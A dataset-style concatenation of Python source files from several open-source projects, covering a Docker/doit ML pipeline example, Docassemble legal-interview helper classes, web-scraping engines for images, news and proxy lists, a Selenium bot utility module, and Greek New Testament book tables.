{
"source": "a2i2/surround",
"score": 2
} |
#### File: examples/hydra_example/dodo.py
```python
import os
import sys
import subprocess
from hydra_example.config import Config
from surround import load_config
CONFIG = load_config(name="config", config_class=Config)
DOIT_CONFIG = {'verbosity':2, 'backend':'sqlite3'}
PACKAGE_PATH = os.path.basename(CONFIG["package_path"])
IMAGE = "%s/%s:%s" % (CONFIG["company"], CONFIG["image"], CONFIG["version"])
IMAGE_JUPYTER = "%s/%s-jupyter:%s" % (CONFIG["company"], CONFIG["image"], CONFIG["version"])
DOCKER_JUPYTER = "Dockerfile.Notebook"
PARAMS = [
{
'name': 'args',
'long': 'args',
'type': str,
'default': ""
}
]
def task_status():
"""Show information about the project such as available runners and assemblers"""
return {
'actions': ["%s -m %s status=1" % (sys.executable, PACKAGE_PATH)]
}
def task_build():
"""Build the Docker image for the current project"""
return {
'actions': ['docker build --tag=%s .' % IMAGE],
'params': PARAMS
}
def task_remove():
"""Remove the Docker image for the current project"""
return {
'actions': ['docker rmi %s %s -f' % (IMAGE, IMAGE_JUPYTER)],
'params': PARAMS
}
def task_dev():
"""Run the main task for the project"""
cmd = [
"docker",
"run",
"--volume",
"\"%s/\":/app" % CONFIG["volume_path"],
"%s" % IMAGE,
"python3 -m %s %s" % (PACKAGE_PATH, "%(args)s")
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_interactive():
"""Run the Docker container in interactive mode"""
def run():
cmd = [
'docker',
'run',
'-it',
'--rm',
'-w',
'/app',
'--volume',
'%s/:/app' % CONFIG['volume_path'],
IMAGE,
'bash'
]
process = subprocess.Popen(cmd, encoding='utf-8')
process.wait()
return {
'actions': [run]
}
def task_prod():
"""Run the main task inside a Docker container for use in production """
return {
'actions': ["docker run %s python3 -m %s %s" % (IMAGE, PACKAGE_PATH, "%(args)s")],
'task_dep': ["build"],
'params': PARAMS
}
def task_train():
"""Run training mode inside the container"""
output_path = CONFIG["volume_path"] + "/output"
data_path = CONFIG["volume_path"] + "/input"
cmd = [
"docker run",
"--volume \"%s\":/app/output" % output_path,
"--volume \"%s\":/app/input" % data_path,
IMAGE,
"python3 -m hydra_example mode=train %(args)s"
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_batch():
"""Run batch mode inside the container"""
output_path = CONFIG["volume_path"] + "/output"
data_path = CONFIG["volume_path"] + "/input"
cmd = [
"docker run",
"--volume \"%s\":/app/output" % output_path,
"--volume \"%s\":/app/input" % data_path,
IMAGE,
"python3 -m hydra_example mode=batch %(args)s"
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_train_local():
"""Run training mode locally"""
cmd = [
sys.executable,
"-m %s" % PACKAGE_PATH,
"mode=train",
"%(args)s"
]
return {
'basename': 'trainLocal',
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_batch_local():
"""Run batch mode locally"""
cmd = [
sys.executable,
"-m %s" % PACKAGE_PATH,
"mode=batch",
"%(args)s"
]
return {
'basename': 'batchLocal',
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_build_jupyter():
"""Build the Docker image for a Jupyter Lab notebook"""
return {
'basename': 'buildJupyter',
'actions': ['docker build --tag=%s . -f %s' % (IMAGE_JUPYTER, DOCKER_JUPYTER)],
'task_dep': ['build'],
'params': PARAMS
}
def task_jupyter():
"""Run a Jupyter Lab notebook"""
cmd = [
"docker",
"run",
"-itp",
"8888:8888",
'-w',
'/app',
"--volume",
"\"%s/\":/app" % CONFIG["volume_path"],
IMAGE_JUPYTER
]
return {
'actions': [" ".join(cmd)],
}
```
#### File: hydra_example/hydra_example/__main__.py
```python
import os
import hydra
from surround import Surround, Assembler
from .config import Config
from .stages import Baseline, InputValidator
from .file_system_runner import FileSystemRunner
RUNNERS = [
FileSystemRunner()
]
ASSEMBLIES = [
Assembler("baseline")
.set_stages([InputValidator(), Baseline()])
]
@hydra.main(config_name="config")
def main(config: Config) -> None:
surround = Surround(
RUNNERS,
ASSEMBLIES,
config,
"hydra_example",
"Example showing the use of the Hydra framework.",
os.path.dirname(os.path.dirname(__file__))
)
if config.status:
surround.show_info()
else:
surround.run(config.runner, config.assembler, config.mode)
if __name__ == "__main__":
main(None)
```
#### File: surround/surround/stage.py
```python
from abc import ABC, abstractmethod
class Stage(ABC):
"""
Base class of all stages in a Surround pipeline.
See the following class for more information:
- :class:`surround.stage.Estimator`
"""
def dump_output(self, state, config):
"""
Dump the output of the stage after the stage has transformed the data.
.. note:: This is called by :meth:`surround.assembler.Assembler.run` (when dumping output is requested).
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Config of the pipeline
:type config: :class:`surround.config.BaseConfig`
"""
def operate(self, state, config):
"""
Main function to be called in an assembly.
:param state: Contains all pipeline state including input and output data
:param config: Config for the assembly
"""
def initialise(self, config):
"""
Initialise the stage, this may be loading a model or loading data.
.. note:: This is called by :meth:`surround.assembler.Assembler.init_assembler`.
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
class Estimator(Stage):
"""
Base class for an estimator in a Surround pipeline. Responsible for performing estimation
or training using the input data.
This stage is executed by :meth:`surround.assembler.Assembler.run`.
Example::
class Predict(Estimator):
def initialise(self, config):
self.model = load_model(os.path.join(config["models_path"], "model.pb"))
def estimate(self, state, config):
state.output_data = run_model(self.model)
def fit(self, state, config):
state.output_data = train_model(self.model)
"""
@abstractmethod
def estimate(self, state, config):
"""
Process input data and store estimated values.
.. note:: This method is ONLY called by :meth:`surround.assembler.Assembler.run` when
running in predict/batch-predict mode.
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
def fit(self, state, config):
"""
Train a model using the input data.
.. note:: This method is ONLY called by :meth:`surround.assembler.Assembler.run` when
running in training mode.
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
``` |
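Since `Stage` declares no abstract methods, a non-estimator stage only needs to override `operate`. A minimal sketch (the class name and state fields are illustrative):
```python
# Illustrative stage: uppercases whatever text arrived in the state object.
class UpperCaseStage(Stage):
    def operate(self, state, config):
        state.output_data = state.input_data.upper()
```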
{
"source": "a2jut/docassemble-AssemblyLine",
"score": 2
} |
#### File: docassemble/AssemblyLine/al_general.py
```python
from typing import Dict, List, Union
from docassemble.base.util import Address, Individual, DAList, date_difference, name_suffix, states_list, comma_and_list, word, comma_list, url_action, get_config, phone_number_is_valid, validation_error, DAWeb, as_datetime, DADateTime, subdivision_type
from docassemble.base.functions import DANav
import re
__all__ = ['ALAddress',
           'ALAddressList',
           'ALPeopleList',
           'ALIndividual',
           'section_links',
           'is_phone_or_email',
           'Landlord',
           'Tenant',
           'HousingAuthority',
           'Applicant',
           'Abuser',
           'Survivor',
           'PeopleList',
           'VCIndividual',
           'AddressList',
           'github_modified_date',
           'will_send_to_real_court',
           'safe_subdivision_type']
##########################################################
# Base classes
def safe_subdivision_type(country_code):
try:
return subdivision_type(country_code)
except:
return None
class ALAddress(Address):
# Future-proofing TODO: this class can be used to help handle international addresses in the future.
# Most likely, ask for international address as just 3 unstructured lines. Key thing is
# the built-in address object requires some fields to be defined that we don't want to require of
# international addresses when you want to render it to text.
def address_fields(self, country_code=None, default_state=None, show_country=False):
fields = [
{"label": str(self.address_label), "address autocomplete": True, "field": self.attr_name('address')},
{"label": str(self.unit_label), "field": self.attr_name('unit'), "required": False},
{"label": str(self.city_label), "field": self.attr_name("city")},
]
if country_code:
fields.append(
{"label": str(self.state_label), "field": self.attr_name("state"), "code": "states_list(country_code='{}')".format(country_code), "default": default_state if default_state else ''}
)
else:
fields.append(
{"label": str(self.state_label), "field": self.attr_name("state"), "default": default_state if default_state else ''}
)
if country_code == "US":
fields.append(
{"label": str(self.zip_label), "field": self.attr_name('zip'), "required": False}
)
else:
fields.append(
# We have code in ALWeaver that relies on "zip", so keep attribute same for now
{"label": str(self.postal_code_label), "field": self.attr_name('zip'), "required": False}
)
if show_country:
fields.append({"label": self.country_label, "field": self.attr_name("address.country"), "required": False, "code": "countries_list()", "default": country_code})
        # NOTE: using "datatype": "combobox" might be nice but does not play together well w/ address autocomplete
return fields
class ALAddressList(DAList):
"""Store a list of Address objects"""
def init(self, *pargs, **kwargs):
super(ALAddressList, self).init(*pargs, **kwargs)
self.object_type = ALAddress
def __str__(self):
return comma_and_list([item.on_one_line() for item in self])
class ALPeopleList(DAList):
"""Used to represent a list of people. E.g., defendants, plaintiffs, children"""
def init(self, *pargs, **kwargs):
super(ALPeopleList, self).init(*pargs, **kwargs)
self.object_type = ALIndividual
def names_and_addresses_on_one_line(self, comma_string:str='; ') -> str:
"""Returns the name of each person followed by their address, separated by a semicolon"""
return comma_and_list([str(person) + ', ' + person.address.on_one_line() for person in self], comma_string=comma_string)
def familiar(self) -> str:
return comma_and_list([person.name.familiar() for person in self])
def familiar_or(self) -> str:
return comma_and_list([person.name.familiar() for person in self],and_string=word("or"))
class ALIndividual(Individual):
"""Used to represent an Individual on the assembly line project.
    Custom attributes that are themselves objects need initializing: `previous_addresses`,
    `other_addresses`, and `mailing_address`
"""
previous_addresses: ALAddressList
other_addresses: ALAddressList
mailing_address: ALAddress
def init(self, *pargs, **kwargs):
super(ALIndividual, self).init(*pargs, **kwargs)
# Initialize the attributes that are themselves objects. Requirement to work with Docassemble
# See: https://docassemble.org/docs/objects.html#ownclassattributes
# NOTE: this stops you from passing the address to the constructor
self.reInitializeAttribute('address',ALAddress)
if not hasattr(self, 'previous_addresses'):
self.initializeAttribute('previous_addresses', ALAddressList)
if not hasattr(self, 'other_addresses'):
self.initializeAttribute('other_addresses', ALAddressList)
if not hasattr(self, 'mailing_address'):
self.initializeAttribute('mailing_address',ALAddress)
def signature_if_final(self, i: str):
if i == 'final':
return self.signature
else:
return ''
def phone_numbers(self) -> str:
nums = []
if hasattr(self, 'mobile_number') and self.mobile_number:
nums.append({self.mobile_number: 'cell'})
if hasattr(self, 'phone_number') and self.phone_number:
nums.append({self.phone_number: 'other'})
if len(nums) > 1:
return comma_list([list(num.keys())[0] + ' (' + list(num.values())[0] + ')' for num in nums])
elif len(nums):
return list(nums[0].keys())[0]
else:
return ''
def contact_methods(self)-> str:
"""Method to return a formatted string with all provided contact methods of the individual:
* Phone number(s)
* Email
* other method
Returns:
str: Formatted string
"""
methods = []
if self.phone_numbers():
methods.append({self.phone_numbers(): word("by phone at ")})
if hasattr(self, 'email') and self.email:
methods.append({self.email: word("by email at ")})
if hasattr(self, 'other_contact_method') and self.other_contact_method:
methods.append({self.other_contact_method: "by "})
return comma_and_list([list(method.values())[0] + list(method.keys())[0] for method in methods if len(method)], and_string=word("or"))
def merge_letters(self, new_letters: str):
# TODO: move to 209A package
"""If the Individual has a child_letters attribute, add the new letters to the existing list"""
if hasattr(self, 'child_letters'):
self.child_letters = filter_letters([new_letters, self.child_letters])
else:
self.child_letters = filter_letters(new_letters)
def formatted_age(self) -> str:
dd = date_difference(self.birthdate)
if dd.years >= 2:
return '%d years' % (int(dd.years),)
if dd.weeks > 12:
return '%d months' % (int(dd.years * 12.0),)
if dd.weeks > 2:
return '%d weeks' % (int(dd.weeks),)
return '%d days' % (int(dd.days),)
# This design helps us translate the prompts for common fields just once
def name_fields(self, person_or_business:str = 'person') -> List[Dict[str, str]]:
"""
Return suitable field prompts for a name. If `uses_parts` is None, adds the
proper "show ifs" and uses both the parts and the single entry
"""
if person_or_business == 'person':
return [
{"label": str(self.first_name_label), "field": self.attr_name('name.first')},
{"label": str(self.middle_name_label), "field": self.attr_name('name.middle'), "required": False},
{"label": str(self.last_name_label), "field": self.attr_name("name.last")},
{"label": str(self.suffix_label), "field": self.attr_name("name.suffix"), "choices": name_suffix(), "required": False}
]
elif person_or_business == 'business':
# Note: we don't make use of the name.text field for simplicity
            # TODO: this could be reconsidered, but name.text tends to lead to developer error
return [
{"label": str(self.business_name_label), "field": self.attr_name('name.first')}
]
else:
# Note: the labels are template block objects: if they are keys,
# they should be converted to strings first
show_if_indiv = {"variable": self.attr_name("person_type"), "is": "ALIndividual"}
show_if_business = {"variable": self.attr_name("person_type"), "is": "business"}
return [
{"label": str(self.person_type_label), "field": self.attr_name('person_type'),
"choices": [{str(self.individual_choice_label): "ALIndividual"},
{str(self.business_choice_label): "business"}],
"input type": "radio", "required": True},
# Individual questions
{"label": str(self.first_name_label), "field": self.attr_name('name.first'),
"show if": show_if_indiv},
{"label": str(self.middle_name_label), "field": self.attr_name('name.middle'), "required": False,
"show if": show_if_indiv},
{"label": str(self.last_name_label), "field": self.attr_name("name.last"),
"show if": show_if_indiv},
{"label": str(self.suffix_label), "field": self.attr_name("name.suffix"), "choices": name_suffix(), "required": False,
"show if": show_if_indiv},
# Business names
{"label": str(self.business_name_label), "field": self.attr_name('name.first'),
"show if": show_if_business}
]
def address_fields(self, country_code:str="US", default_state:str=None, show_country:bool=False) -> List[Dict[str, str]]:
"""
Return field prompts for address.
"""
# TODO make this more flexible to work w/ homeless individuals and
# international addresses
return self.address.address_fields(country_code=country_code, default_state=default_state, show_country=show_country)
def gender_fields(self, show_help=False):
"""
Return a standard gender input with "self described" option.
"""
choices = [
{str(self.gender_female_label): 'female'},
{str(self.gender_male_label): 'male'},
{str(self.gender_nonbinary_label): 'nonbinary'},
{str(self.gender_prefer_not_to_say_label): 'prefer-not-to-say'},
{str(self.gender_prefer_self_described_label): 'self-described'},
]
self_described_input = {"label": str(self.gender_self_described_label),
"field": self.attr_name('gender'),
"show if": {"variable": self.attr_name('gender'),
"is": 'self-described'},
}
if show_help:
return [
{"label": str(self.gender_label),
"field": self.attr_name('gender'),
"choices": choices,
"help": str(self.gender_help_text)
},
self_described_input
]
else:
return [
{"label": self.gender_label,
"field": self.attr_name('gender'),
"choices": choices,
},
self_described_input
]
def contact_fields(self):
"""
Return field prompts for other contact info
"""
pass
def section_links(nav: DANav) -> List[str]:
"""Returns a list of clickable navigation links without animation."""
sections = nav.get_sections()
section_link = []
for section in sections:
for key in section:
section_link.append('[' + section[key] + '](' + url_action(key) + ')' )
return section_link
########################################################
# Subject-specific classes
class Landlord(ALIndividual):
pass
class Tenant(ALIndividual):
pass
class HousingAuthority(Landlord):
pass
class Applicant(Tenant):
pass
class Abuser(ALIndividual):
pass
class Survivor(ALIndividual):
pass
########################################################
# Compatibility layer to help with migration
# TODO: consider removing after packages migrated
class VCIndividual(ALIndividual):
pass
class AddressList(ALAddressList):
pass
class PeopleList(ALPeopleList):
pass
########################################################
# Miscellaneous functions needed for baseline questions
# These could go in toolbox but keeping here to reduce packages
# needed for baseline running.
def will_send_to_real_court() -> bool:
"""Dev or root needs to be in the URL root: can change in the config file"""
return not ('dev' in get_config('url root') or
'test' in get_config('url root') or
'localhost' in get_config('url root'))
# This one is only used for 209A--should move there along with the combined_letters() method
def filter_letters(letter_strings: Union[List[str], str]) -> str:
"""Used to take a list of letters like ["A","ABC","AB"] and filter out any duplicate letters."""
# There is probably a cute one liner, but this is easy to follow and
# probably same speed
unique_letters = set()
if isinstance(letter_strings, str):
letter_strings = [letter_strings]
for string in letter_strings:
if string: # Catch possible None values
for letter in string:
unique_letters.add(letter)
try:
retval = ''.join(sorted(unique_letters))
except:
retval = ''
return retval
# Note: removed "combined_locations" because it is too tightly coupled to MACourts.py right now
def fa_icon(icon:str, color:str="primary", color_css:str=None, size:str="sm"):
"""
Return HTML for a font-awesome icon of the specified size and color. You can reference
a CSS variable (such as Bootstrap theme color) or a true CSS color reference, such as 'blue' or
'#DDDDDD'. Defaults to Bootstrap theme color "primary".
"""
if not color and not color_css:
return ':' + icon + ':' # Default to letting Docassemble handle it
elif color_css:
return '<i class="fa fa-' + icon + ' fa-' + size + '" style="color:' + color_css + ';"></i>'
else:
return '<i class="fa fa-' + icon + ' fa-' + size + '" style="color:var(--' + color + ');"></i>'
def is_phone_or_email(text:str)->bool:
"""
Returns True if the string is either a valid phone number or a valid email address.
Email validation is extremely minimal--just checks for an @ sign between two non-zero length
strings.
"""
    if re.match(r"\S+@\S+", text) or phone_number_is_valid(text):
return True
else:
validation_error("Enter a valid phone number or email address")
def github_modified_date(github_user:str, github_repo_name:str)->Union[DADateTime, None]:
"""
Returns the date that the given GitHub repository was modified or None if API call fails.
Will check for the presence of credentials in the configuration labeled "github readonly"
in this format:
github readonly:
username: YOUR_GITHUB_USERNAME
password: <PASSWORD>
type: basic
If no valid auth information is in the configuration, it will fall back to anonymous authentication.
The GitHub API is rate-limited to 60 anonymous API queries/hour.
"""
github_readonly_web = DAWeb(base_url="https://api.github.com")
res = github_readonly_web.get("repos/" + github_user + '/' + github_repo_name, auth=get_config("github readonly"))
if res and res.get('pushed_at'):
return as_datetime(res.get('pushed_at'))
else:
return None
``` |
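A quick usage sketch of the standalone helpers above (the user, repository, and icon names are placeholders, and the GitHub call needs network access):
```python
# Placeholders only; swap in a real user/repo to get a DADateTime back.
last_push = github_modified_date("some-user", "some-repo")
icon_html = fa_icon("check", color="success")  # Bootstrap theme color
```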
{
"source": "A2Media-id/spidery",
"score": 3
} |
#### File: spider/images/__init__.py
```python
from abc import ABC, abstractmethod
from typing import List
from spidery.spider.engine import BaseCrawl
from spidery.spider.resource import DataImage
class ImageEngine(BaseCrawl, ABC):
def __init__(self, **kwargs):
super(ImageEngine, self).__init__(**kwargs)
self.max_page = kwargs.get('max_page', 2)
def search(self, term) -> List[DataImage]:
result = []
page = 1
while page <= self.max_page:
has_next, ret = self._loop_search(term, page)
result += ret
if not has_next:
break
page += 1
return result
@abstractmethod
def _loop_search(self, term: str, page: int) -> [bool, List]:
pass
```
#### File: spider/images/yahoo.py
```python
import html
import json
import logging
import re
import traceback
from typing import Dict, List
from urllib.parse import quote_plus, unquote
from spidery.spider.images import ImageEngine
from spidery.spider.resource import DataImage
class Engine(ImageEngine):
"""The resource quality of this engine is good, but the search is a bit slow (there are too many invalid resources)"""
_regex = r"\sdata='(\{[^\}]+\})'"
_limit = 25
_me = __file__
def _loop_search(self, term: str, page: int) -> [bool, List]:
result = []
api = 'https://images.search.yahoo.com/search/images'
params = {'q': quote_plus(term), 'b': page, 'count': self._limit,
'qft': '+filterui:imagesize-large', 'adlt': 'off', 'tab': 'organic',
'safeSearch': 'off'}
ret = self.get(url=api, params=params) # Both keywords and results must be gb2312 encoding
if not ret:
logging.error(f"Engine {self.me()} search failed: {term}")
return False, result
if not re.search(self._regex, ret.text, re.IGNORECASE | re.MULTILINE):
logging.error(f"Engine {self.me()} search failed: {term} server did not return results")
return False, result
items = re.findall(self._regex, ret.text)
if items:
items = set(map(html.unescape, items))
try:
                while items:
try:
item: Dict = json.loads(items.pop())
dat = DataImage(engine=self.me())
for k, v in item.items():
value = unquote(v).strip() if (v and type(v) == str) else v
if k == 'alt':
dat.title = value
dat.desc = value
elif k == 'ourl':
dat.url = value
elif k == 'rurl':
dat.source = value
if not dat.url:
continue
elif dat.url and self.blacklisted_domain(dat.url):
continue
else:
result.append(dat)
                    except KeyboardInterrupt:
                        return False, result
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
raise
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
now_page, total_page = (page, self._limit)
has_next = (int(now_page) < int(total_page) and len(result)) # Whether there is a next page
logging.info(f"Engine {__class__.__module__} is searching: {term} ({now_page}/{total_page})")
return has_next, result
if __name__ == '__main__':
eng = Engine()
for news in eng.search('cicak'):
print(news)
```
#### File: spider/news/__init__.py
```python
import logging
import re
import traceback
from abc import abstractmethod, ABC
from typing import List
from bs4 import BeautifulSoup
from spidery.spider.engine import BaseCrawl
from spidery.spider.resource import DataNews, DataArticle
class NewsEngine(BaseCrawl, ABC):
_me = __file__
def __init__(self, **kwargs):
super(NewsEngine, self).__init__(**kwargs)
@staticmethod
def _get_all_images(soup: BeautifulSoup) -> List:
results = []
try:
attrs = ['src', 'data-src', 'data-srcset']
datas = soup.find_all('img') or []
added = set()
for i, im in enumerate(datas):
default_text = im.get('alt') or im.text
parent = im.parent
if not default_text and parent:
default_text = parent.string
text = str(default_text).replace('\n', '').strip()
for atr in attrs:
if not im.get(atr):
continue
ims = str(im.get(atr)).split()
for img in ims:
if re.search(r"https?://([A-Za-z_0-9.-]+)(\/[^\s]+)?", img, re.IGNORECASE) and img not in added:
image = re.sub(r"(,(w_\d+|ar_\d+:\d+)|\/w\d+$)", "", str(img).strip(), 0,
re.IGNORECASE | re.VERBOSE)
added.add(img)
results.append((image, text))
except Exception as error:
logging.error(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
finally:
return results
@abstractmethod
def get_detail(self, data: DataNews) -> DataArticle:
pass
@abstractmethod
def get_latest(self) -> List[DataNews]:
pass
```
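A concrete engine only has to fill in the two abstract methods. A skeletal sketch (the method bodies are placeholders, not a real site parser; the `DataArticle` constructor arguments are assumed to mirror the other resource classes):
```python
# Skeletal engine; bodies are placeholders for a real listing/article parser.
class Engine(NewsEngine):
    _me = __file__

    def get_latest(self):
        # Fetch a listing page and map each entry to a DataNews record.
        return []

    def get_detail(self, data):
        # Fetch data.url, parse the article body, and return the result.
        return DataArticle(engine=self.me())
```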
#### File: spider/proxy/checkerproxy.py
```python
import logging
import re
import traceback
from spidery.spider.engine import ProxyEngine
from spidery.spider.resource import ProxyData
from spidery.utils.func import pad
class Engine(ProxyEngine):
_me = __file__
urls = ['https://checkerproxy.net/getAllProxy']
def __init__(self, **kwargs):
super(Engine, self).__init__(**kwargs)
def _parse_raw(self, html):
try:
archives = re.findall(r"(archive/\d{4}-\d{2}-\d{2})", html, re.IGNORECASE | re.MULTILINE)
for archive in archives:
headers = {
'authority': 'checkerproxy.net',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"',
'sec-ch-ua-mobile': '?0',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49',
'accept': '*/*',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://checkerproxy.net/archive/{archive}',
'accept-language': 'en-US,en;q=0.9',
}
proxies = self._get_json(f'https://checkerproxy.net/api/{archive}', headers=headers)
if proxies:
for _, proxy in enumerate(proxies):
try:
host, port = pad(str(proxy.get('addr')).split(':'), 2, None)
if not host:
continue
elif not port:
continue
yield ProxyData(**{
'host': host,
'port': port,
'country': proxy.get('ip_geo_iso'),
'type': 'https' if str(port) == '8080' else 'http',
})
except Exception as error:
logging.exception(
''.join(
traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
if __name__ == '__main__':
eng = Engine()
for proxy in eng.search():
print(proxy)
```
#### File: spidery/ua/agent.py
```python
import logging
import os.path
import pickle
import random
import re
import traceback
from spidery.utils.func import write_file, cap_sentence, num_to_alpha
from .device_type import DeviceType
UA_BIN = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ua.bin')
class Agent:
user_agents = pickle.load(open(UA_BIN, 'rb'))
def __init__(self, **kwargs):
params = {
'name': kwargs.get('name', None),
'brand': kwargs.get('brand', None),
'brand_code': kwargs.get('brand_code', None),
'code': kwargs.get('code', None),
'type': kwargs.get('type', DeviceType.BROWSER),
'category': kwargs.get('category', None),
'engine': kwargs.get('engine', None),
'family': kwargs.get('family', None),
'family_code': kwargs.get('family_code', None),
'family_vendor': kwargs.get('family_vendor', None),
'is_crawler': kwargs.get('is_crawler', False),
}
self._filtered = self._parse_kwargs(**params)
def get_random(self):
return random.choice(self._filtered) if len(self._filtered) else None
def __gen_class__(self):
C_K = {}
C_C = {}
for i, x in enumerate(self.user_agents):
for kk, kv in x.items():
print({type(kv): kv})
C_K[kk] = C_K.get(kk) if kk in C_K.keys() else set()
if type(kv) == str and kv:
C_K[kk].add(kv)
if type(kv) == dict:
for ck, cv in kv.items():
C_C[ck] = C_C.get(ck) if ck in C_C.keys() else set()
if type(cv) == str and cv:
C_C[ck].add(cv)
print(C_C.keys())
write_file('A.txt', str('\n').join(C_K.keys()))
for k, v in C_K.items():
if len(v):
write_file(f'A-{k}.txt', str('\n').join(list(v)))
write_file('B.txt', str('\n').join(C_C.keys()))
for k, v in C_C.items():
if len(v):
write_file(f'B-{k}.txt', str('\n').join(list(v)))
al = ['A.txt', 'B.txt']
for x in al:
print(x)
if os.path.isfile(x):
ls = open(x).read().splitlines()
h = x.rstrip('.txt')
for c in ls:
cx = f'{h}-{c}.txt'
print({cx: os.path.isfile(cx)})
if os.path.isfile(cx):
ad = str(re.sub("[^0-9a-zA-Z]", " ", c, 0, re.IGNORECASE)).capitalize()
ad = str(re.sub("[^0-9a-zA-Z]", "", cap_sentence(ad.strip()), 0, re.IGNORECASE))
an = str(re.sub("[^0-9a-zA-Z]", "_", c, 0, re.IGNORECASE))
fn = f'{str(an).lower()}.py'
ss = open(cx).read().splitlines()
aa = f"""from enum import Enum\n\nclass {ad}(Enum):"""
cuks = set()
for ln in ss:
cuk = str(re.sub("[^0-9a-zA-Z]", "_", ln, 0, re.IGNORECASE)).upper()
if cuk in cuks:
continue
match = re.search(r"^(\d+)([^\n]+)?", cuk, re.IGNORECASE)
if match:
c_a, c_b = match.groups()
mod = str('_').join(num_to_alpha(c_a).split(','))
mods = [mod,
str(re.sub("[^0-9a-zA-Z]", "_", c_b, 0, re.IGNORECASE)).upper()] if c_b else [
mod]
cuk = str('_').join(mods).upper()
cuk = re.sub("(_){1,}", r"\1", cuk, 0, re.IGNORECASE)
aa += f"""\n\t{cuk}='{ln}'"""
cuks.add(cuk)
write_file(fn, aa)
def _parse_kwargs(self, **kwargs):
flag = []
try:
current = self.user_agents
for k, v in kwargs.items():
try:
v = v.value if hasattr(v, 'value') else v
if v is None:
continue
if type(v) == bool:
filtered = []
for x in current:
for vv in x.values():
if type(vv) == dict and k in vv.keys():
if vv[k] == v:
filtered.append(x)
else:
filtered = [x for x in current if
k in x.keys() and x[k] and (
v in x[k].values() if type(x[k]) == dict else x[k] == v)]
current = filtered
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
flag = [x.get('ua') for x in current]
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
finally:
return flag
if __name__ == '__main__':
ag = Agent()
print(ag.get_random())
print(ag.get_random())
``` |
{
"source": "a2mky/boatbot",
"score": 3
} |
#### File: boatbot/assets/utils.py
```python
from selenium import webdriver
import os
import htmlmin
from random import randint
import time
import yaml
def start():
"""Runs the bot."""
os.system('python3 bot.py')
def message(text):
"""Sends a message in the constant format."""
message = '[{}] {}'.format(time.strftime('%I:%M:%S'), text)
print(message)
def error(location=None):
"""Sends an error message."""
error_msg = 'Nut! An error occurred whilst running the script.'
if location:
message('{} ({})'.format(error_msg, location))
else:
message(error_msg)
def kill():
"""Kills all sessions to reduce lag."""
try:
os.system('pkill -f firefox')
except:
pass
def clean():
"""Cleans and reports if an error occurred"""
try:
kill()
except:
error('Cleaning Sessions')
def config():
"""Fetches information from the config."""
file = 'config.yaml'
    try:
        with open(file) as r:
            data = yaml.safe_load(r)
        return data
    except:
        error('Loading Config')
def profile():
"""Sets up the driver profile."""
profile = webdriver.FirefoxProfile()
profile.set_preference("permissions.default.image", 2)
profile.set_preference("permissions.default.stylesheet", 2)
profile.set_preference("javascript.enabled", False)
return profile
def webhook():
"""Gets the webhook url."""
data = config()
webhook = data['webhook_url']
return webhook
def voyage():
"""Gets the Voyage link."""
data = config()
voyage = data['voyage']
if not voyage:
error('Missing Voyage Link in config.yaml')
else:
pass
return voyage
def line():
"""Prints a line."""
line = '–––––––––––––––––––––––––––––––––––––––––'
print(line)
``` |
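A short sketch tying the helpers together (assumes a `config.yaml` that defines `webhook_url` and `voyage`):
```python
# Illustrative usage; requires config.yaml with webhook_url and voyage keys.
message('Webhook: {}'.format(webhook()))
message('Voyage: {}'.format(voyage()))
line()
```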
{
"source": "a2ohm/gnttb-cli",
"score": 4
} |
#### File: gnttb-cli/sub/get.py
```python
import gnttb.get
from tools import bcv
def get(args):
"""Get a verse given its bcv.
"""
verse = gnttb.get.get(args.bcv)
print('{} : {}'.format(bcv.bcv2str(verse.bcv), verse))
``` |
{
"source": "a2ohm/gnttb",
"score": 4
} |
#### File: gnttb/gnttb/sblgnt.py
```python
import os.path
import collections
# Define a namedtuple to store names of books in different edition
# of the New Testament.
BookNames = collections.namedtuple('BookNames', ['en', 'BJ'])
# List of books of the NT.
# - abbrevations used in files names
# - abbrevations used by the Bible de Jérusalem
sblgnt_books = collections.OrderedDict([
('01' , BookNames('Mt', 'Mt')),
('02' , BookNames('Mk', 'Mc')),
('03' , BookNames('Lk', 'Lc')),
('04' , BookNames('Jn', 'Jn')),
('05' , BookNames('Ac', 'Ac')),
('06' , BookNames('Ro', 'Ro')),
('07' , BookNames('1Co', '1Co')),
('08' , BookNames('2Co', '2Co')),
('09' , BookNames('Ga', 'Ga')),
('10' , BookNames('Eph', 'Ep')),
('11' , BookNames('Php', 'Ph')),
('12' , BookNames('Col', 'Col')),
('13' , BookNames('1Th', '1Th')),
('14' , BookNames('2Th', '2Th')),
('15' , BookNames('1Ti', '1Ti')),
('16' , BookNames('2Ti', '2Ti')),
('17' , BookNames('Tit', 'Tt')),
('18' , BookNames('Phm', 'Phm')),
('19' , BookNames('Heb', 'He')),
('20' , BookNames('Jas', 'Jc')),
